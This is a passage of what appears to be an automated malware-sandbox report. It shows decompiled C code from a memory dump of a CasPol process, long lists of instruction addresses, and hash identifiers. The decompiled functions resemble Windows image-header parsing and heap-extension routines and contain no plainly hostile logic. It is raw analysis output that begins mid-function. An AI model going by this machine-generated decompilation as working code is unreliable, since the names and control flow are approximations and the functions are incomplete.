															_v60 = 0;
															_v48 = 0;
															_v68 = 0;
															_v44 = _t290 & 0xfffffffc;
															E013CE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
															_t306 = _v68;
															__eflags = _t306;
															if(_t306 == 0) {
																_t216 = 0xc000007b;
																_v36 = 0xc000007b;
																_t307 = _v60;
															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L013CEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = E013F9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E013CE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L013C8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E013F3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                                                                        0x013cd5f2
                                                                        0x013cd5f5
                                                                        0x013cd5f5
                                                                        0x013cd5fd
                                                                        0x013cd600
                                                                        0x013cd60a
                                                                        0x013cd60d
                                                                        0x013cd617
                                                                        0x013cd61d
                                                                        0x013cd627
                                                                        0x013cd62e
                                                                        0x013cd911
                                                                        0x013cd913
                                                                        0x00000000
                                                                        0x013cd919
                                                                        0x013cd919
                                                                        0x013cd919
                                                                        0x013cd634
                                                                        0x013cd634
                                                                        0x013cd634
                                                                        0x013cd634
                                                                        0x013cd640
                                                                        0x013cd8bf
                                                                        0x00000000
                                                                        0x013cd646
                                                                        0x013cd646
                                                                        0x013cd64d
                                                                        0x013cd652
                                                                        0x0141b2fc
                                                                        0x0141b2fc
                                                                        0x0141b302
                                                                        0x0141b33b
                                                                        0x0141b341
                                                                        0x00000000
                                                                        0x0141b304
                                                                        0x0141b304
                                                                        0x0141b319
                                                                        0x0141b31e
                                                                        0x0141b324
                                                                        0x0141b326
                                                                        0x0141b332
                                                                        0x0141b347
                                                                        0x0141b34c
                                                                        0x0141b351
                                                                        0x0141b35a
                                                                        0x00000000
                                                                        0x0141b328
                                                                        0x0141b328
                                                                        0x00000000
                                                                        0x0141b328
                                                                        0x0141b326
                                                                        0x013cd658
                                                                        0x013cd658
                                                                        0x013cd65b
                                                                        0x013cd665
                                                                        0x00000000
                                                                        0x013cd66b
                                                                        0x013cd66b
                                                                        0x013cd66b
                                                                        0x013cd66b
                                                                        0x013cd66d
                                                                        0x013cd672
                                                                        0x013cd67a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cd680
                                                                        0x013cd686
                                                                        0x013cd8ce
                                                                        0x013cd8d4
                                                                        0x013cd8dd
                                                                        0x013cd8e0
                                                                        0x013cd68c
                                                                        0x013cd691
                                                                        0x013cd69d
                                                                        0x013cd6a2
                                                                        0x013cd6a7
                                                                        0x013cd6b0
                                                                        0x013cd6b5
                                                                        0x013cd6e0
                                                                        0x013cd6b7
                                                                        0x013cd6b7
                                                                        0x013cd6b9
                                                                        0x013cd6b9
                                                                        0x013cd6bb
                                                                        0x013cd6bd
                                                                        0x013cd6ce
                                                                        0x013cd6d0
                                                                        0x013cd6d2
                                                                        0x0141b363
                                                                        0x0141b365
                                                                        0x00000000
                                                                        0x0141b36b
                                                                        0x00000000
                                                                        0x0141b36b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cd6bf
                                                                        0x013cd6bf
                                                                        0x013cd6e5
                                                                        0x013cd6e7
                                                                        0x013cd6e9
                                                                        0x013cd6ec
                                                                        0x013cd6ec
                                                                        0x013cd6ef
                                                                        0x013cd6f5
                                                                        0x013cd6f9
                                                                        0x013cd6fb
                                                                        0x013cd6fd
                                                                        0x013cd701
                                                                        0x013cd703
                                                                        0x013cd70a
                                                                        0x013cd70a
                                                                        0x013cd701
                                                                        0x013cd710
                                                                        0x013cd710
                                                                        0x013cd6c1
                                                                        0x013cd6c1
                                                                        0x013cd6c6
                                                                        0x0141b36d
                                                                        0x0141b36f
                                                                        0x00000000
                                                                        0x0141b375
                                                                        0x0141b375
                                                                        0x0141b375
                                                                        0x00000000
                                                                        0x0141b375
                                                                        0x00000000
                                                                        0x013cd6cc
                                                                        0x013cd6d8
                                                                        0x013cd6d8
                                                                        0x013cd6d8
                                                                        0x00000000
                                                                        0x013cd6c6
                                                                        0x013cd6bf
                                                                        0x00000000
                                                                        0x013cd6da
                                                                        0x013cd6da
                                                                        0x013cd716
                                                                        0x013cd71b
                                                                        0x013cd720
                                                                        0x013cd726
                                                                        0x013cd726
                                                                        0x013cd72d
                                                                        0x00000000
                                                                        0x013cd733
                                                                        0x013cd739
                                                                        0x013cd742
                                                                        0x013cd750
                                                                        0x013cd758
                                                                        0x013cd764
                                                                        0x013cd776
                                                                        0x013cd77a
                                                                        0x013cd783
                                                                        0x013cd928
                                                                        0x013cd92c
                                                                        0x013cd93d
                                                                        0x013cd944
                                                                        0x013cd94f
                                                                        0x013cd954
                                                                        0x013cd956
                                                                        0x013cd95f
                                                                        0x013cd961
                                                                        0x013cd973
                                                                        0x013cd973
                                                                        0x013cd956
                                                                        0x013cd944
                                                                        0x013cd92c
                                                                        0x013cd78b
                                                                        0x0141b394
                                                                        0x013cd791
                                                                        0x013cd798
                                                                        0x0141b3a3
                                                                        0x0141b3bb
                                                                        0x0141b3bb
                                                                        0x013cd7a5
                                                                        0x013cd866
                                                                        0x013cd870
                                                                        0x013cd892
                                                                        0x013cd898
                                                                        0x013cd89e
                                                                        0x013cd8a0
                                                                        0x013cd8a6
                                                                        0x013cd8ac
                                                                        0x013cd8ae
                                                                        0x013cd8b4
                                                                        0x013cd8b4
                                                                        0x013cd8ae
                                                                        0x013cd7a5
                                                                        0x013cd78b
                                                                        0x013cd7b1
                                                                        0x0141b3c5
                                                                        0x0141b3c5
                                                                        0x013cd7c3
                                                                        0x013cd7ca
                                                                        0x013cd7e5
                                                                        0x013cd7eb
                                                                        0x013cd8eb
                                                                        0x013cd8ed
                                                                        0x00000000
                                                                        0x013cd8f3
                                                                        0x013cd8f3
                                                                        0x013cd8f3
                                                                        0x00000000
                                                                        0x013cd8ed
                                                                        0x013cd7cc
                                                                        0x013cd7cc
                                                                        0x013cd7d2
                                                                        0x00000000
                                                                        0x013cd7d4
                                                                        0x013cd7d4
                                                                        0x013cd7d7
                                                                        0x013cd7df
                                                                        0x0141b3d4
                                                                        0x0141b3d9
                                                                        0x0141b3dc
                                                                        0x0141b3dc
                                                                        0x0141b3df
                                                                        0x0141b3e2
                                                                        0x0141b468
                                                                        0x0141b46d
                                                                        0x0141b46f
                                                                        0x0141b46f
                                                                        0x0141b475
                                                                        0x013cd8f8
                                                                        0x013cd8f9
                                                                        0x013cd8fd
                                                                        0x0141b3e8
                                                                        0x0141b3e8
                                                                        0x0141b3eb
                                                                        0x0141b3ed
                                                                        0x00000000
                                                                        0x0141b3ef
                                                                        0x0141b3ef
                                                                        0x0141b3f1
                                                                        0x0141b3f4
                                                                        0x0141b3fe
                                                                        0x0141b404
                                                                        0x0141b409
                                                                        0x0141b40e
                                                                        0x0141b410
                                                                        0x0141b410
                                                                        0x0141b414
                                                                        0x0141b414
                                                                        0x0141b41b
                                                                        0x0141b420
                                                                        0x0141b423
                                                                        0x0141b425
                                                                        0x0141b427
                                                                        0x0141b42a
                                                                        0x0141b42d
                                                                        0x0141b42d
                                                                        0x0141b42a
                                                                        0x0141b432
                                                                        0x0141b436
                                                                        0x0141b438
                                                                        0x0141b43b
                                                                        0x0141b43b
                                                                        0x0141b449
                                                                        0x0141b44e
                                                                        0x0141b454
                                                                        0x0141b458
                                                                        0x0141b458
                                                                        0x0141b45d
                                                                        0x00000000
                                                                        0x0141b45d
                                                                        0x0141b3ed
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cd7df
                                                                        0x013cd7d2
                                                                        0x013cd7ca
                                                                        0x0141b37c
                                                                        0x0141b37e
                                                                        0x0141b385
                                                                        0x0141b38a
                                                                        0x00000000
                                                                        0x0141b38a
                                                                        0x013cd742
                                                                        0x013cd7f1
                                                                        0x013cd7f8
                                                                        0x0141b49b
                                                                        0x0141b49b
                                                                        0x013cd800
                                                                        0x013cd837
                                                                        0x013cd843
                                                                        0x013cd845
                                                                        0x013cd847
                                                                        0x013cd84a
                                                                        0x013cd84b
                                                                        0x013cd84e
                                                                        0x013cd857
                                                                        0x013cd818
                                                                        0x013cd824
                                                                        0x013cd831
                                                                        0x0141b4a5
                                                                        0x0141b4ab
                                                                        0x0141b4b3
                                                                        0x0141b4b8
                                                                        0x0141b4bb
                                                                        0x00000000
                                                                        0x0141b4c1
                                                                        0x0141b4c1
                                                                        0x0141b4c8
                                                                        0x00000000
                                                                        0x0141b4ce
                                                                        0x0141b4d4
                                                                        0x0141b4e1
                                                                        0x0141b4e3
                                                                        0x0141b4e5
                                                                        0x00000000
                                                                        0x0141b4eb
                                                                        0x0141b4f0
                                                                        0x0141b4f2
                                                                        0x013cdac9
                                                                        0x013cdacc
                                                                        0x013cdacf
                                                                        0x013cdad1
                                                                        0x013cdd78
                                                                        0x013cdd78
                                                                        0x013cdcf2
                                                                        0x00000000
                                                                        0x013cdad7
                                                                        0x013cdad9
                                                                        0x013cdadb
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cdae1
                                                                        0x013cdae1
                                                                        0x013cdae4
                                                                        0x013cdae6
                                                                        0x0141b4f9
                                                                        0x0141b4f9
                                                                        0x0141b500
                                                                        0x013cdaec
                                                                        0x013cdaec
                                                                        0x013cdaf5
                                                                        0x013cdaf8
                                                                        0x013cdafb
                                                                        0x013cdb03
                                                                        0x013cdb11
                                                                        0x013cdb16
                                                                        0x013cdb19
                                                                        0x013cdb1b
                                                                        0x0141b52c
                                                                        0x0141b531
                                                                        0x0141b534
                                                                        0x013cdb21
                                                                        0x013cdb21
                                                                        0x013cdb24
                                                                        0x013cdcd9
                                                                        0x013cdce2
                                                                        0x013cdce5
                                                                        0x013cdd6a
                                                                        0x013cdd6d
                                                                        0x00000000
                                                                        0x013cdd73
                                                                        0x0141b51a
                                                                        0x0141b51c
                                                                        0x0141b51f
                                                                        0x0141b524
                                                                        0x00000000
                                                                        0x0141b524
                                                                        0x013cdce7
                                                                        0x013cdce7
                                                                        0x013cdce7
                                                                        0x00000000
                                                                        0x013cdce7
                                                                        0x00000000
                                                                        0x013cdb2a
                                                                        0x013cdb2c
                                                                        0x013cdb31
                                                                        0x013cdb33
                                                                        0x013cdb36
                                                                        0x013cdb39
                                                                        0x013cdb3b
                                                                        0x013cdb66
                                                                        0x013cdb66
                                                                        0x013cdb3d
                                                                        0x013cdb3d
                                                                        0x013cdb3e
                                                                        0x013cdb46
                                                                        0x013cdb47
                                                                        0x013cdb49
                                                                        0x013cdb4c
                                                                        0x013cdb53
                                                                        0x013cdb55
                                                                        0x013cdb58
                                                                        0x013cdb5a
                                                                        0x0141b50a
                                                                        0x0141b50f
                                                                        0x0141b512
                                                                        0x013cdb60
                                                                        0x013cdb60
                                                                        0x013cdb63
                                                                        0x013cdb63
                                                                        0x00000000
                                                                        0x013cdb63
                                                                        0x013cdb5a
                                                                        0x013cdb3b
                                                                        0x013cdb24
                                                                        0x013cdb69
                                                                        0x013cdb69
                                                                        0x013cdb6c
                                                                        0x013cdb6f
                                                                        0x013cdb74
                                                                        0x0141b557
                                                                        0x0141b557
                                                                        0x0141b55e
                                                                        0x013cdb7a
                                                                        0x013cdb7c
                                                                        0x013cdb7f
                                                                        0x013cdb82
                                                                        0x013cdb85
                                                                        0x00000000
                                                                        0x013cdb8b
                                                                        0x013cdb8b
                                                                        0x013cdb8d
                                                                        0x013cdb9b
                                                                        0x013cdb9b
                                                                        0x013cdb9d
                                                                        0x013cdba0
                                                                        0x013cdba2
                                                                        0x013cdba4
                                                                        0x013cdba7
                                                                        0x013cdba9
                                                                        0x013cdbae
                                                                        0x013cdbae
                                                                        0x013cdbb1
                                                                        0x013cdbb4
                                                                        0x013cdbb4
                                                                        0x013cdbb7
                                                                        0x013cdbba
                                                                        0x013cdcd2
                                                                        0x013cdcd4
                                                                        0x00000000
                                                                        0x013cdbc0
                                                                        0x013cdbc0
                                                                        0x013cdbd2
                                                                        0x013cdbd7
                                                                        0x013cdbda
                                                                        0x013cdbdd
                                                                        0x013cdbdf
                                                                        0x00000000
                                                                        0x013cdbe5
                                                                        0x013cdbe5
                                                                        0x013cdbee
                                                                        0x013cdbf1
                                                                        0x0141b541
                                                                        0x0141b544
                                                                        0x00000000
                                                                        0x0141b546
                                                                        0x0141b546
                                                                        0x00000000
                                                                        0x0141b546
                                                                        0x013cdbf7
                                                                        0x013cdbf7
                                                                        0x013cdbfd
                                                                        0x013cdbfd
                                                                        0x013cdbff
                                                                        0x013cdc0b
                                                                        0x013cdc15
                                                                        0x013cdc1b
                                                                        0x013cdc1d
                                                                        0x013cdc21
                                                                        0x013cdc21
                                                                        0x013cdc23
                                                                        0x013cdc23
                                                                        0x013cdc26
                                                                        0x013cdc29
                                                                        0x013cdc2b
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cdc31
                                                                        0x013cdc34
                                                                        0x013cdc36
                                                                        0x013cdcbf
                                                                        0x013cdcbf
                                                                        0x013cdcc2
                                                                        0x00000000
                                                                        0x013cdc3c
                                                                        0x013cdc41
                                                                        0x013cdc43
                                                                        0x00000000
                                                                        0x013cdc45
                                                                        0x013cdc45
                                                                        0x013cdc47
                                                                        0x00000000
                                                                        0x013cdc4d
                                                                        0x013cdc4d
                                                                        0x013cdc50
                                                                        0x013cdc52
                                                                        0x013cdc55
                                                                        0x013cdcfa
                                                                        0x013cdcfe
                                                                        0x013cdd08
                                                                        0x013cdd0a
                                                                        0x013cdd0c
                                                                        0x00000000
                                                                        0x013cdd12
                                                                        0x013cdd15
                                                                        0x013cdd2d
                                                                        0x013cdd2f
                                                                        0x013cdd32
                                                                        0x013cdd35
                                                                        0x00000000
                                                                        0x013cdd35
                                                                        0x013cdc5b
                                                                        0x013cdc5b
                                                                        0x013cdc5e
                                                                        0x013cdc61
                                                                        0x013cdc64
                                                                        0x013cdc67
                                                                        0x013cdc67
                                                                        0x013cdc6a
                                                                        0x013cdc6c
                                                                        0x013cdc8e
                                                                        0x013cdc8e
                                                                        0x013cdc91
                                                                        0x013cdc93
                                                                        0x013cdcce
                                                                        0x013cdcce
                                                                        0x013cdc95
                                                                        0x013cdc9c
                                                                        0x013cdc6e
                                                                        0x013cdc72
                                                                        0x013cdc75
                                                                        0x013cdc77
                                                                        0x013cdc79
                                                                        0x0141b551
                                                                        0x0141b551
                                                                        0x00000000
                                                                        0x013cdc7f
                                                                        0x013cdc7f
                                                                        0x013cdc81
                                                                        0x00000000
                                                                        0x013cdc83
                                                                        0x013cdc86
                                                                        0x013cdc88
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cdc88
                                                                        0x013cdc81
                                                                        0x013cdc79
                                                                        0x013cdc6c
                                                                        0x013cdc55
                                                                        0x013cdc47
                                                                        0x013cdc43
                                                                        0x00000000
                                                                        0x013cdc36
                                                                        0x013cdc23
                                                                        0x00000000
                                                                        0x013cdbff
                                                                        0x013cdbf1
                                                                        0x013cdbdf
                                                                        0x013cdb8f
                                                                        0x013cdb92
                                                                        0x013cdb95
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cdb95
                                                                        0x013cdb8d
                                                                        0x013cdb85
                                                                        0x013cdb74
                                                                        0x013cdc9f
                                                                        0x013cdca2
                                                                        0x013cdcb0
                                                                        0x013cdcb0
                                                                        0x013cdad1
                                                                        0x0141b4e5
                                                                        0x0141b4c8
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x013cd831
                                                                        0x00000000
                                                                        0x013cd800
                                                                        0x0141b47f
                                                                        0x0141b485
                                                                        0x00000000
                                                                        0x0141b485
                                                                        0x013cd665
                                                                        0x013cd652
                                                                        0x00000000

                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.354344636.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_1390000_CasPol.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: da1b5d76aca51051c460e71aa32d062d2e247d74d23bd7aaa7cbd2838b38c926
                                                                        • Instruction ID: 5385f2289259a9bbc4f6d42a8829be869c86bddc49212f321b2b066c10686c7e
                                                                        • Opcode Fuzzy Hash: da1b5d76aca51051c460e71aa32d062d2e247d74d23bd7aaa7cbd2838b38c926
                                                                        • Instruction Fuzzy Hash: 94E1F331A0035ACFEB31DF68C884B6ABBB5FF45718F0541AEE909576A1D730AD91CB81
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 013DB236 Relevance: .3, Instructions: 305COMMONCrypto
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 86%
                                                                        			E013DB236(signed int __ecx, intOrPtr __edx) {
				unsigned int _v8;
				signed int _v12;
				unsigned int _v16;
				char _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				unsigned int _t94;
				signed int _t96;
				intOrPtr _t97;
				unsigned int _t101;
				char _t103;
				signed int _t114;
				signed int _t115;
				signed char* _t118;
				intOrPtr _t119;
				signed int _t120;
				signed char* _t123;
				signed int _t129;
				char* _t132;
				unsigned int _t147;
				signed int _t157;
				unsigned int _t158;
				signed int _t159;
				signed int _t165;
				signed int _t168;
				signed char _t175;
				signed char _t185;
				unsigned int _t197;
				unsigned int _t206;
				unsigned int* _t214;
				signed int _t218;

				_t156 = __edx;
				_v24 = __edx;
				_t218 = __ecx;
				_t3 = _t156 + 0xfff; // 0xfff
				_t210 = 0;
				_v16 = _t3 & 0xfffff000;
				if(E013DB477(__ecx,  &_v16) == 0) {
					__eflags =  *(__ecx + 0x40) & 0x00000002;
					if(( *(__ecx + 0x40) & 0x00000002) == 0) {
						L32:
						__eflags =  *(_t218 + 0x40) & 0x00000080;
						if(( *(_t218 + 0x40) & 0x00000080) != 0) {
							_t210 = E0145CB4F(_t218);
							__eflags = _t210;
							if(_t210 == 0) {
								goto L33;
							}
							__eflags = ( *_t210 & 0x0000ffff) - _t156;
							if(( *_t210 & 0x0000ffff) < _t156) {
								goto L33;
							}
							_t157 = _t210;
							goto L3;
						}
						L33:
						_t157 = 0;
						__eflags = _t210;
						if(_t210 != 0) {
							__eflags =  *(_t218 + 0x4c);
							if( *(_t218 + 0x4c) != 0) {
								 *(_t210 + 3) =  *(_t210 + 2) ^  *(_t210 + 1) ^  *_t210;
								 *_t210 =  *_t210 ^  *(_t218 + 0x50);
							}
						}
						goto L3;
					}
					_v12 = _v12 & 0;
					_t158 = __edx + 0x2000;
					_t94 =  *((intOrPtr*)(__ecx + 0x64));
					__eflags = _t158 - _t94;
					if(_t158 > _t94) {
						_t94 = _t158;
					}
					__eflags =  *((char*)(_t218 + 0xda)) - 2;
					if( *((char*)(_t218 + 0xda)) != 2) {
						_t165 = 0;
					} else {
						_t165 =  *(_t218 + 0xd4);
					}
					__eflags = _t165;
					if(_t165 == 0) {
						__eflags = _t94 - 0x3f4000;
						if(_t94 >= 0x3f4000) {
							 *(_t218 + 0x48) =  *(_t218 + 0x48) | 0x20000000;
						}
					}
					_t96 = _t94 + 0x0000ffff & 0xffff0000;
					_v8 = _t96;
					__eflags = _t96 - 0xfd0000;
					if(_t96 >= 0xfd0000) {
						_v8 = 0xfd0000;
					}
					_t97 = E013E0678(_t218, 1);
					_push(_t97);
					_push(0x2000);
					_v28 = _t97;
					_push( &_v8);
					_push(0);
					_push( &_v12);
					_push(0xffffffff);
					_t168 = E013F9660();
					__eflags = _t168;
					if(_t168 < 0) {
						while(1) {
							_t101 = _v8;
							__eflags = _t101 - _t158;
							if(_t101 == _t158) {
								break;
							}
							_t147 = _t101 >> 1;
							_v8 = _t147;
							__eflags = _t147 - _t158;
							if(_t147 < _t158) {
								_v8 = _t158;
							}
							_push(_v28);
							_push(0x2000);
							_push( &_v8);
							_push(0);
							_push( &_v12);
							_push(0xffffffff);
							_t168 = E013F9660();
							__eflags = _t168;
							if(_t168 < 0) {
								continue;
							} else {
								_t101 = _v8;
								break;
							}
						}
						__eflags = _t168;
						if(_t168 >= 0) {
							goto L12;
						}
						 *((intOrPtr*)(_t218 + 0x214)) =  *((intOrPtr*)(_t218 + 0x214)) + 1;
						goto L60;
					} else {
						_t101 = _v8;
						L12:
						 *((intOrPtr*)(_t218 + 0x64)) =  *((intOrPtr*)(_t218 + 0x64)) + _t101;
						_t103 = _v24 + 0x1000;
						__eflags = _t103 -  *((intOrPtr*)(_t218 + 0x68));
						if(_t103 <=  *((intOrPtr*)(_t218 + 0x68))) {
							_t103 =  *((intOrPtr*)(_t218 + 0x68));
						}
						_push(_v28);
						_v20 = _t103;
						_push(0x1000);
						_push( &_v20);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						_t159 = E013F9660();
						__eflags = _t159;
						if(_t159 < 0) {
							L59:
							E013E174B( &_v12,  &_v8, 0x8000);
							L60:
							_t156 = _v24;
							goto L32;
						} else {
							_t114 = E013E138B(_t218, _v12, 0x40, _t168, 2, _v12, _v20 + _v12, _v8 + 0xfffff000 + _t192);
							__eflags = _t114;
							if(_t114 == 0) {
								_t159 = 0xc0000017;
							}
							__eflags = _t159;
							if(_t159 < 0) {
								goto L59;
							} else {
								_t115 = E013D7D50();
								_t212 = 0x7ffe0380;
								__eflags = _t115;
								if(_t115 != 0) {
									_t118 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t118 = 0x7ffe0380;
								}
								__eflags =  *_t118;
								if( *_t118 != 0) {
									_t119 =  *[fs:0x30];
									__eflags =  *(_t119 + 0x240) & 0x00000001;
									if(( *(_t119 + 0x240) & 0x00000001) != 0) {
										E0147138A(0x226, _t218, _v12, _v20, 4);
										__eflags = E013D7D50();
										if(__eflags != 0) {
											_t212 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E01471582(0x226, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t212 & 0x000000ff);
									}
								}
								_t120 = E013D7D50();
								_t213 = 0x7ffe038a;
								__eflags = _t120;
								if(_t120 != 0) {
									_t123 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t123 = 0x7ffe038a;
								}
								__eflags =  *_t123;
								if( *_t123 != 0) {
									__eflags = E013D7D50();
									if(__eflags != 0) {
										_t213 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
									}
									E01471582(0x230, _t218,  *(_v12 + 0x24), __eflags, _v20,  *(_t218 + 0x74) << 3,  *_t213 & 0x000000ff);
								}
								_t129 = E013D7D50();
								__eflags = _t129;
								if(_t129 != 0) {
									_t132 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
								} else {
									_t132 = 0x7ffe0388;
								}
								__eflags =  *_t132;
								if( *_t132 != 0) {
									E0146FEC0(0x230, _t218, _v12, _v8);
								}
								__eflags =  *(_t218 + 0x4c);
								_t214 =  *(_v12 + 0x24);
								if( *(_t218 + 0x4c) != 0) {
									_t197 =  *(_t218 + 0x50) ^  *_t214;
									 *_t214 = _t197;
									_t175 = _t197 >> 0x00000010 ^ _t197 >> 0x00000008 ^ _t197;
									__eflags = _t197 >> 0x18 - _t175;
									if(__eflags != 0) {
										_push(_t175);
										E0146FA2B(0x230, _t218, _t214, _t214, _t218, __eflags);
									}
								}
								_t157 =  *(_v12 + 0x24);
								goto L3;
							}
						}
					}
				} else {
					_v16 = _v16 >> 3;
					_t157 = E013D99BF(__ecx, _t87,  &_v16, 0);
					E013DA830(__ecx, _t157, _v16);
					if( *(_t218 + 0x4c) != 0) {
						_t206 =  *(_t218 + 0x50) ^  *_t157;
						 *_t157 = _t206;
						_t185 = _t206 >> 0x00000010 ^ _t206 >> 0x00000008 ^ _t206;
						if(_t206 >> 0x18 != _t185) {
							_push(_t185);
							E0146FA2B(_t157, _t218, _t157, 0, _t218, __eflags);
						}
					}
					L3:
					return _t157;
				}
			}






































                                                                        0x013db23f
                                                                        0x013db246
                                                                        0x013db249
                                                                        0x013db24b
                                                                        0x013db251
                                                                        0x013db258
                                                                        0x013db262
                                                                        0x013db2b2
